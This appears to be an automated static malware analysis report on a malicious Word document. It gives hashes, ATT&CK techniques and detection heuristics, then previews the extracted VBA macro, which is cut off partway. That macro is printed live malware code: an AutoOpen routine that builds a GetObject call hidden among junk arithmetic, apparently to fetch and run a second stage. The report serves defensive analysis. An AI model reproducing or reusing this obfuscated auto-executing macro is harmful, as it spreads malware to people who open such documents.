Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84dabb37496af03e…

MALICIOUS

Office (OLE)

160.5 KB Created: 2019-04-01 12:59:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 393b9a7d76b22c768f0aa5fad6d69414 SHA-1: ceafb04c1a2f6771c8c9994d40837a02c178bd67 SHA-256: 84dabb37496af03ead61a973bc1a7231570256ac035eeb840cf37bf01d86d34c
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The presence of legacy WordBasic auto-exec markers and VBA macros, specifically an AutoOpen macro and a GetObject call, strongly suggests malicious intent. The ClamAV detection and the heuristic for VBA p-code auto-execution with execution tokens further support this. While the VBA code is heavily obfuscated and truncated, the overall pattern indicates an attempt to download and execute a second-stage payload, typical of macro-based malware.

Heuristics 7

  • ClamAV: Doc.Malware.Sagent-6931221-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6931221-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23118 bytes
SHA-256: b485b62e125dc8c7418581ec5c45b136e8aeb956ab3940b9d9fc92fd492eca34
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "lABAAxk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PAGDDA"
Attribute VB_Base = "0{501D72E0-95CA-4E24-9F06-6E7AA1A2041D}{CE30A4C5-87F4-4E91-9CB3-E136520C2A27}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "z_CCAA"
Attribute VB_Base = "0{3E184899-ED40-48D8-A179-9C0C95E63BBE}{7364B5A7-4DE9-445E-BC3B-D259B9480943}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zU1okUA"
Function JAAAUA()
   OkUBAQ _
= CStr(pUAU_X + 116707867 + 516065813 _
* CDate(DQAUcxA * ChrW(325014452 / CDate(iAZQAZ)))) _
+ Rnd(h1BBQA + (340789119 + 260335350) * _
CDate(AxDAGAQ_ * CVar(535798935 / CDate(TCDCA_))))
   zDDBADA _
= CStr(sA_ABQQ + 259317512 + 41403532 _
* CDate(mAAADA_ * ChrW(339408510 / CDate(JAAAXGUA)))) _
+ Rnd(I__BQAc + (338407806 + 134658921) * _
CDate(LZUAGA * CVar(764702621 / CDate(jUCUGA1B))))
   EZkQxQx _
= CStr(iUCAcZAG + 88966497 + 394178343 _
* CDate(KX4D_AAc * ChrW(637698855 / CDate(zQCA41)))) _
+ Rnd(BD4XZAXZ + (217727560 + 557925586) * _
CDate(iZDoAQ * CVar(684440462 / CDate(mwwADC))))
End Function
Function CUXAAA4c()
   pCAUwBcA _
= CStr(uDDA_A + 759973452 + 527470049 _
* CDate(UBxAA_XA * ChrW(574272963 / CDate(VDxADA)))) _
+ Rnd(fZABAoQ + (235023204 + 219588339) * _
CDate(lAAAZw * CVar(956599172 / CDate(nAGBUxZ))))
   K_GAo1Z _
= CStr(jUwAAAA + 570031726 + 69580249 _
* CDate(QA4CxAZ * ChrW(366545827 / CDate(MQ1wDoQ)))) _
+ Rnd(JwoAADw + (243815178 + 201875902) * _
CDate(KAZDXA * CVar(857256187 / CDate(IAkDAU))))
End Function
Sub autoopen()
sGwQA11
End Sub
Function sGwQA11()
On Error Resume Next
   C_DQAcG _
= CStr(c_CGXQ + 62742426 + 644734202 _
* CDate(bQCQ4QA * ChrW(277261086 / CDate(cAGAwx_)))) _
+ Rnd(BoAQ1QDQ + (474445185 + 916564153) * _
CDate(aAAwck * CVar(701059557 / CDate(FUBCG1Ak))))
   lQGkwQC4 _
= CStr(A1CAAD + 672567468 + 933822670 _
* CDate(lAZk11A1 * ChrW(614379727 / CDate(LkxDXAwA)))) _
+ Rnd(uoZDwA4o + (152625577 + 351980225) * _
CDate(BAAxQAAA * CVar(672616682 / CDate(BQXABA))))
   CxBBAwZ _
= CStr(ncCQAx + 153316099 + 30882516 _
* CDate(HDAACB * ChrW(387328764 / CDate(rCGAA1B_)))) _
+ Rnd(ZQZQA4 + (903739644 + 341684145) * _
CDate(Z1AAwAQ * CVar(406558833 / CDate(wQUBAAkA))))
Set ZBwCQAG = GetObject(PAGDDA.qwA_BAD.Text + z_CCAA.vx4D_D1 + PAGDDA.qwA_BAD)
   FAA_A4 _
= CStr(K1BZBD + 551131358 + 729163559 _
* CDate(UZQkAQAQ * ChrW(518000452 / CDate(WDQwQA_x)))) _
+ Rnd(aAwUAA + (228056675 + 423826524) * _
CDate(bcBAGAc1 * CVar(849857878 / CDate(EcwQXA1))))
   cUCxQUB1 _
= CStr(t_ZUAxUA + 892327107 + 450913011 _
* CDate(VDxDDooA * ChrW(162958052 / CDate(XDA1_AQ)))) _
+ Rnd(kQoAoQ_ + (157030188 + 894840054) * _
CDate(aAAAocAA * CVar(976825957 / CDate(jDBA4A))))
If 955461 = 955461 Then
   p1xcAAA _
= CStr(LcADDxG + 748825824 + 406957944 _
* CDate(YA_AAk * ChrW(536428696 / CDate(DQwAkDQU)))) _
+ Rnd(TUUAAU4X + (287851315 + 696061703) * _
CDate(ikoAAB1A * CVar(695712248 / CDate(cAGQcw))))
   qcAAoD_ _
= CStr(aQAAwAAA + 427624474 + 106388616 _
* CDate(qDAXUAA * ChrW(904082946 / CDate(YBBAAQ)))) _
+ Rnd(KBAUGAB + (812205452 + 471441303) * _
CDate(Zo_CAc4X * CVar(624268896 / CDate(OkwDABDX))))
   FCBAC_oZ _
= CStr(bAc_B4DZ + 331041224 + 589511286 _
* CDate(nCA1_AX * ChrW(310676114 / CDate(KGQAwCA)))) _
+ Rnd(LAUUBA + (483694242 + 552368124) * _
CDate(IwAXAX * CVar(647290823 / CDate(AAAQkcA))))
ZBwCQAG. _
ShOwWiNdOw = PAGDDA.b_BAAUU + PAGDDA.b_BAAUU + PAGDDA.b_BAAUU
   ixAUCA_ _
= CStr(ZwXAkDAB + 683533666 + 648843714 _
* CDate(N
... (truncated)